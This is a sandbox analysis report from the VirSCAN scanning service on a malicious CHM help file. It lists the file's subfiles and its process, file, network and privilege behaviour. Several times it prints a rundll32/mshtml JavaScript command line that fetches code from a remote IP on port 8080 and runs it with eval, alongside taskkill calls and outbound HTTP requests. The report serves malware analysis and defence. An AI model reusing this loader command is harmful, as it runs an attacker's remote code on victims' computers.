VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

Language
Server load
Server Load

File information
Safety rating:61
Behavior list
Basic Information
MD5:8b839dd44d94adc1cc7be3ca34d40221
file type:CHM帮助文件
Production company:
version:
Shell or compiler information:
Subfile information:$FIftiMain / c301bab6d33da570e89e7b3ed9d3d539 / Unknown
#SYSTEM / 97c9685278cd5aa8f9698f5b24988f75 / Unknown
#IDXHDR / d1e1ec4adb50da435d932e0e0f65146e / Unknown
$OBJINST / 81cabeada2fee00893dbd17ac173c907 / Unknown
BTree / c805773ee52688961346c7d41eb464e5 / Unknown
hta(msiexec)不弹窗.html / 0c3c1a0115ecae5ec2218265810b1bd7 / Unknown
TOC-Created-By-Easy-CHM.HHC / 5089c0ed5f646a86e1366c6a584d13f8 / Unknown
Index-Created-By-Easy-CHM.HHK / 85fe2c13b458cced48342f49c187d49e / Unknown
#WINDOWS / 16d03a483ea3bc0d493751308c4b3f38 / Unknown
#STRINGS / d53cad39401b9e6486c8ce49be22814f / Unknown
#URLSTR / edfa5194eeac89a9553575ec78686ba0 / Unknown
#TOPICS / 964db660d9ed637297d6efc2e772cac4 / Unknown
#URLTBL / 33f15c84af65de19e0dfb20bbaffedf5 / Unknown
Property / eea896b7533e6178258893a58505d73e / Unknown
Data / 89be2a5b0eb8892255d222b8eb46cc39 / Unknown
Map / 86299d74b00af81f597352245a4a9ca1 / Unknown
Property / f1d3ff8443297732862df21dc4e57262 / Unknown
$WWAssociativeLinksdumpFile / d41d8cd98f00b204e9800998ecf8427e / Unknown
#ITBITS / d41d8cd98f00b204e9800998ecf8427e / Unknown
Key behavior
Behavior description:多次强杀进程
details:C:\WINDOWS\system32\rundll32.exe
Behavior description:设置特殊文件夹属性
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:杀掉进程
details:TASKKILL = taskkill /f /im rundll32.exe
C:\WINDOWS\system32\rundll32.exe
Process behavior
Behavior description:隐藏窗口创建进程
details:ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
Behavior description:创建进程
details:[0x00000a68]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000a9c]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
[0x00000aa4]ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /f /im rundll32.exe
[0x00000c0c]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000c34]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
[0x00000c44]ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /f /im rundll32.exe
[0x00000c58]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000c80]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000cb4]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
[0x00000cbc]ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /f /im rundll32.exe
[0x00000cec]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000d1c]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /im rundll32.exe
[0x00000d24]ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /f /im rundll32.exe
[0x00000d38]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
[0x00000d68]ImagePath = C:\WINDOWS\system32\rundll32.exe, CmdLine = "C:\WINDOWS\system32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://45.76.197.150:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20A
Behavior description:多次强杀进程
details:C:\WINDOWS\system32\rundll32.exe
Behavior description:创建本地线程
details:TargetProcess: hh.exe, InheritedFromPID = 2000, ProcessID = 2540, ThreadID = 2588, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: hh.exe, InheritedFromPID = 2000, ProcessID = 2540, ThreadID = 2628, StartAddress = 6359727B, Parameter = 001B0750
TargetProcess: hh.exe, InheritedFromPID = 2000, ProcessID = 2540, ThreadID = 2632, StartAddress = 77E56C7D, Parameter = 041E0600
TargetProcess: hh.exe, InheritedFromPID = 2000, ProcessID = 2540, ThreadID = 2636, StartAddress = 769AE43B, Parameter = 0446C180
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 2664, ThreadID = 2672, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 2664, ThreadID = 2680, StartAddress = 6359727B, Parameter = 00D9B5E0
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 2664, ThreadID = 2684, StartAddress = 77E56C7D, Parameter = 0016FA90
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 2664, ThreadID = 2688, StartAddress = 769AE43B, Parameter = 00E15B38
TargetProcess: taskkill.exe, InheritedFromPID = 2716, ProcessID = 2724, ThreadID = 2732, StartAddress = 77E56C7D, Parameter = 000EAC28
TargetProcess: taskkill.exe, InheritedFromPID = 2716, ProcessID = 2724, ThreadID = 2736, StartAddress = 769AE43B, Parameter = 000ED5C8
TargetProcess: taskkill.exe, InheritedFromPID = 2716, ProcessID = 2724, ThreadID = 2740, StartAddress = 77E56C7D, Parameter = 000EDD50
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 3084, ThreadID = 3092, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 3084, ThreadID = 3096, StartAddress = 6359727B, Parameter = 00D9B5E0
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 3084, ThreadID = 3100, StartAddress = 77E56C7D, Parameter = 0016FA90
TargetProcess: rundll32.exe, InheritedFromPID = 2540, ProcessID = 3084, ThreadID = 3104, StartAddress = 769AE43B, Parameter = 00E15B38
Behavior description:杀掉进程
details:TASKKILL = taskkill /f /im rundll32.exe
C:\WINDOWS\system32\rundll32.exe
File behavior
Behavior description:创建文件
details:C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat
C:\Documents and Settings\Administrator\Local Settings\Temp\IMT7.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\~DF92B1.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\~DF92CD.tmp
Behavior description:删除文件
details:C:\Documents and Settings\Administrator\Local Settings\Temp\IMT7.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\~DF92CD.tmp
Behavior description:设置特殊文件夹属性
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:修改文件内容
details:C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat ---> Offset = 96
C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat ---> Offset = 180
C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat ---> Offset = 240
C:\Documents and Settings\Administrator\Application Data\Microsoft\HTML Help\hh.dat ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\IMT7.tmp ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\IMT7.tmp ---> Offset = 84
Behavior description:查找文件
details:FileName = C:\Documents and Settings\Administrator\Local Settings\Temp
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\%temp%\****.chm
FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\Local Settings
FileName = C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\rundll32.exe
FileName = cmd.*
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\cmd.*
FileName = C:\WINDOWS\system32\cmd.*
FileName = C:\WINDOWS\system32\cmd.exe
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\taskkill.*
Network behavior
Behavior description:连接指定站点
details:WinHttpConnect: ServerName = **.76.197.**, PORT = 8080, UserName = , Password = , hSession = 0x019a3100, hConnect = 0x019a3200, Flags = 0x00000000
Behavior description:打开HTTP连接
details:WinHttpOpen: UserAgent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), hSession = 0x019a3100
Behavior description:建立到一个指定的套接字连接
details:IP: **.76.197.**:8080, SOCKET = 0x000002b8
IP: **.76.197.**:8080, SOCKET = 0x000002bc
Behavior description:发送HTTP包
details:GET /connect HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: **.76.197.**:8080 Connection: Keep-Alive
Behavior description:打开HTTP请求
details:WinHttpOpenRequest: **.76.197.**:8080/connect, hConnect = 0x019a3200, hRequest = 0x01a10000, Verb: GET, Referer: , Flags = 0x00000080
Other behavior
Behavior description:创建互斥体
details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Local\!PrivacIE!SharedMemory!Mutex
MSCTF.Shared.MUTEX.IOH
MSCTF.Shared.MUTEX.APJ
Behavior description:创建事件对象
details:EventName = MSCTF.SendReceive.Event.APJ.IC
EventName = MSCTF.SendReceiveConection.Event.APJ.IC
Behavior description:打开事件
details:\SECURITY\LSA_AUTHENTICATION_INITIALIZED
CTF.ThreadMIConnectionEvent.000007E8.00000000.0000000F
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.0000000F
MSFT.VSA.COM.DISABLE.2540
MSFT.VSA.IEC.STATUS.6c736db0
_fCanRegisterWithShellService
MSFT.VSA.COM.DISABLE.2664
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000010
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000010
MSCTF.SendReceiveConection.Event.IOH.IKCB
MSCTF.SendReceive.Event.IOH.IKCB
MSFT.VSA.COM.DISABLE.2724
MSCTF.SendReceive.Event.IOH.IC
MSCTF.SendReceiveConection.Event.IOH.IC
MSFT.VSA.COM.DISABLE.3084
Behavior description:查找指定窗口
details:NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [MS_AutodialMonitor,]
NtUserFindWindowEx: [Class,Window] = [MS_WebCheckMonitor,]
NtUserFindWindowEx: [Class,Window] = [,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
NtUserFindWindowEx: [Class,Window] = [OleMainThreadWndClass,]
Behavior description:窗口信息
details:Pid = 2540, Hwnd=0x1033a, Text = test, ClassName = HH Parent.
Behavior description:调整进程token权限
details:SE_LOAD_DRIVER_PRIVILEGE
SE_DEBUG_PRIVILEGE
Behavior description:枚举窗口
details:N/A
Behavior description:打开互斥体
details:ShimCacheMutex
Local\WininetStartupMutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
Local\!IETld!Mutex
CtfmonInstMutexDefaultS-*
Run screenshot
VirSCAN

About VirSCAN | Privacy Policy | Contact us | Links | Help VirSCAN
中国反网络病毒联盟
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号